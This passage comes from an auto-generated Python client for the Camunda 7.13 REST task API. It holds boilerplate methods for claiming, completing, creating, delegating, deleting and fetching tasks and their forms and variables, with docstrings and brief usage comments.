Claims a task for a specific user. **Note:** The difference with the [Set Assignee](https://docs.camunda.org/manual/7.13/reference/rest/task/post-assignee/) method is that here a check is performed to see if the task already has a user assigned to it. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.claim_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to claim. (required)
:param UserIdDto user_id_dto: Provide the id of the user that claims the task.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'user_id_dto'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method claim" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `claim`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'user_id_dto' in local_var_params:
body_params = local_var_params['user_id_dto']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/claim', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def complete(self, id, **kwargs): # noqa: E501
"""complete # noqa: E501
Completes a task and updates process variables. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.complete(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to complete. (required)
:param CompleteTaskDto complete_task_dto:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: dict(str, VariableValueDto)
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.complete_with_http_info(id, **kwargs) # noqa: E501
def complete_with_http_info(self, id, **kwargs): # noqa: E501
"""complete # noqa: E501
Completes a task and updates process variables. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.complete_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to complete. (required)
:param CompleteTaskDto complete_task_dto:
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(dict(str, VariableValueDto), status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'complete_task_dto'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method complete" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `complete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'complete_task_dto' in local_var_params:
body_params = local_var_params['complete_task_dto']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/complete', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, VariableValueDto)', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def create_task(self, **kwargs): # noqa: E501
"""create_task # noqa: E501
Creates a new task. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_task(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param TaskDto task_dto:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_task_with_http_info(**kwargs) # noqa: E501
def create_task_with_http_info(self, **kwargs): # noqa: E501
"""create_task # noqa: E501
Creates a new task. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_task_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param TaskDto task_dto:
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'task_dto'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_task" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'task_dto' in local_var_params:
body_params = local_var_params['task_dto']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/create', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delegate_task(self, id, **kwargs): # noqa: E501
"""delegate_task # noqa: E501
Delegates a task to another user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delegate_task(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to delegate. (required)
:param UserIdDto user_id_dto: Provide the id of the user that the task should be delegated to.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delegate_task_with_http_info(id, **kwargs) # noqa: E501
def delegate_task_with_http_info(self, id, **kwargs): # noqa: E501
"""delegate_task # noqa: E501
Delegates a task to another user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delegate_task_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to delegate. (required)
:param UserIdDto user_id_dto: Provide the id of the user that the task should be delegated to.
:param _return_http_data_only: return the response data only, without
the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'user_id_dto'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delegate_task" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `delegate_task`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'user_id_dto' in local_var_params:
body_params = local_var_params['user_id_dto']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/delegate', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
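# Illustrative sketch (assumed names, hypothetical ids): delegating a task
# by passing a UserIdDto-shaped body; with async_req=True the call instead
# returns a thread whose .get() yields the result, as in the doctest above.
#
#     api.delegate_task("aTaskId", user_id_dto={"userId": "jonny1"})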
def delete_task(self, id, **kwargs): # noqa: E501
"""delete_task # noqa: E501
Removes a task by id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_task(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to be removed. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_task_with_http_info(id, **kwargs) # noqa: E501
def delete_task_with_http_info(self, id, **kwargs): # noqa: E501
"""delete_task # noqa: E501
Removes a task by id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_task_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to be removed. (required)
:param _return_http_data_only: return the response data only, without
the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_task" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `delete_task`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
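# Illustrative sketch (hypothetical id): removing a task. The endpoint
# returns no body, so the call yields None on success.
#
#     api.delete_task("aTaskId")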
def get_deployed_form(self, id, **kwargs): # noqa: E501
"""get_deployed_form # noqa: E501
Retrieves the deployed form that is referenced from a given task. For further information please refer to the [User Guide](https://docs.camunda.org/manual/7.13/user-guide/task-forms/#embedded-task-forms). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_deployed_form(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to get the deployed form for. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: file
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_deployed_form_with_http_info(id, **kwargs) # noqa: E501
def get_deployed_form_with_http_info(self, id, **kwargs): # noqa: E501
"""get_deployed_form # noqa: E501
Retrieves the deployed form that is referenced from a given task. For further information please refer to the [User Guide](https://docs.camunda.org/manual/7.13/user-guide/task-forms/#embedded-task-forms). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_deployed_form_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to get the deployed form for. (required)
:param _return_http_data_only: return the response data only, without
the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(file, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_deployed_form" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_deployed_form`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/xhtml+xml', 'application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/deployed-form', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='file', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
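# Illustrative sketch (hypothetical id): with _preload_content=False the
# raw urllib3.HTTPResponse is returned, so the deployed form markup can be
# read directly instead of being decoded as a model.
#
#     resp = api.get_deployed_form("aTaskId", _preload_content=False)
#     form_markup = resp.data.decode("utf-8")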
def get_form(self, id, **kwargs): # noqa: E501
"""get_form # noqa: E501
Retrieves the form key for a task. The form key corresponds to the `FormData#formKey` property in the engine. This key can be used to do task-specific form rendering in client applications. Additionally, the context path of the containing process application is returned. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_form(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to retrieve the form for. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: FormDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_form_with_http_info(id, **kwargs) # noqa: E501
def get_form_with_http_info(self, id, **kwargs): # noqa: E501
"""get_form # noqa: E501
Retrieves the form key for a task. The form key corresponds to the `FormData#formKey` property in the engine. This key can be used to do task-specific form rendering in client applications. Additionally, the context path of the containing process application is returned. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_form_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to retrieve the form for. (required)
:param _return_http_data_only: return the response data only, without
the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(FormDto, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_form" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_form`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/form', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FormDto', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
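# Illustrative sketch (hypothetical id; attribute names assume the
# generated FormDto model): the form key and context path can be combined
# by a client application to resolve the embedded form location.
#
#     form = api.get_form("aTaskId")
#     print(form.key, form.context_path)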
def get_form_variables(self, id, **kwargs): # noqa: E501
"""get_form_variables # noqa: E501
Retrieves the form variables for a task. The form variables take form data specified on the task into account. If form fields are defined, the variable types and default values of the form fields are taken into account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_form_variables(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to retrieve the variables for. (required)
:param str variable_names: A comma-separated list of variable names. Allows restricting the list of requested variables to the variable names in the list. It is best practice to restrict the list of variables to the variables actually required by the form in order to minimize fetching of data. If the query parameter is omitted, all variables are fetched. If the query parameter contains non-existent variable names, the variable names are ignored.
:param bool deserialize_values: Determines whether serializable variable values (typically variables that store custom Java objects) should be deserialized on the server side (default true). If set to true, a serializable variable will be deserialized on the server side and transformed to JSON using [Jackson's](http://jackson.codehaus.org/) POJO/bean property introspection feature. Note that this requires the Java classes of the variable value to be on the REST API's classpath. If set to false, a serializable variable will be returned in its serialized format. For example, a variable that is serialized as XML will be returned as a JSON string containing XML. Note: While true is the default value for reasons of backward compatibility, we recommend setting this parameter to false when developing web applications that are independent of the Java process applications deployed to the engine.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: dict(str, VariableValueDto)
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_form_variables_with_http_info(id, **kwargs) # noqa: E501
def get_form_variables_with_http_info(self, id, **kwargs): # noqa: E501
"""get_form_variables # noqa: E501
Retrieves the form variables for a task. The form variables take form data specified on the task into account. If form fields are defined, the variable types and default values of the form fields are taken into account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_form_variables_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to retrieve the variables for. (required)
:param str variable_names: A comma-separated list of variable names. Allows restricting the list of requested variables to the variable names in the list. It is best practice to restrict the list of variables to the variables actually required by the form in order to minimize fetching of data. If the query parameter is omitted, all variables are fetched. If the query parameter contains non-existent variable names, the variable names are ignored.
:param bool deserialize_values: Determines whether serializable variable values (typically variables that store custom Java objects) should be deserialized on the server side (default true). If set to true, a serializable variable will be deserialized on the server side and transformed to JSON using [Jackson's](http://jackson.codehaus.org/) POJO/bean property introspection feature. Note that this requires the Java classes of the variable value to be on the REST API's classpath. If set to false, a serializable variable will be returned in its serialized format. For example, a variable that is serialized as XML will be returned as a JSON string containing XML. Note: While true is the default value for reasons of backward compatibility, we recommend setting this parameter to false when developing web applications that are independent of the Java process applications deployed to the engine.
:param _return_http_data_only: return the response data only, without
the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(dict(str, VariableValueDto), status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'variable_names',
'deserialize_values'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_form_variables" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_form_variables`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'variable_names' in local_var_params and local_var_params['variable_names'] is not None: # noqa: E501
query_params.append(('variableNames', local_var_params['variable_names'])) # noqa: E501
if 'deserialize_values' in local_var_params and local_var_params['deserialize_values'] is not None: # noqa: E501
query_params.append(('deserializeValues', local_var_params['deserialize_values'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/form-variables', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, VariableValueDto)', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
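# Illustrative sketch (hypothetical id and variable names): restricting
# the fetch to the variables the form actually needs, with
# deserialize_values=False as the docstring above recommends.
#
#     variables = api.get_form_variables(
#         "aTaskId",
#         variable_names="amount,approver",
#         deserialize_values=False)
#     for name, value_dto in variables.items():
#         print(name, value_dto.value, value_dto.type)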
def get_rendered_form(self, id, **kwargs): # noqa: E501
"""get_rendered_form # noqa: E501
Retrieves the rendered form for a task. This method can be used to get the HTML rendering of a [Generated Task Form](https://docs.camunda.org/manual/7.13/user-guide/task-forms/#generated-task-forms). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_rendered_form(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to get the rendered form for. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: file
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_rendered_form_with_http_info(id, **kwargs) # noqa: E501
def get_rendered_form_with_http_info(self, id, **kwargs): # noqa: E501
"""get_rendered_form # noqa: E501
Retrieves the rendered form for a task. This method can be used to get the HTML rendering of a [Generated Task Form](https://docs.camunda.org/manual/7.13/user-guide/task-forms/#generated-task-forms). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_rendered_form_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to get the rendered form for. (required)
:param _return_http_data_only: return the response data only, without
the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(file, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_rendered_form" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_rendered_form`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/xhtml+xml', 'application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/rendered-form', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='file', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
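# Illustrative sketch (hypothetical id): like get_deployed_form, the
# rendered form is a file-type response; _preload_content=False exposes
# the raw XHTML via the urllib3 response.
#
#     resp = api.get_rendered_form("aTaskId", _preload_content=False)
#     xhtml = resp.data.decode("utf-8")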
def get_task(self, id, **kwargs): # noqa: E501
"""get_task # noqa: E501
Retrieves a task by id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_task(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to be retrieved. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: TaskDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_task_with_http_info(id, **kwargs) # noqa: E501
def get_task_with_http_info(self, id, **kwargs): # noqa: E501
"""get_task # noqa: E501
Retrieves a task by id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
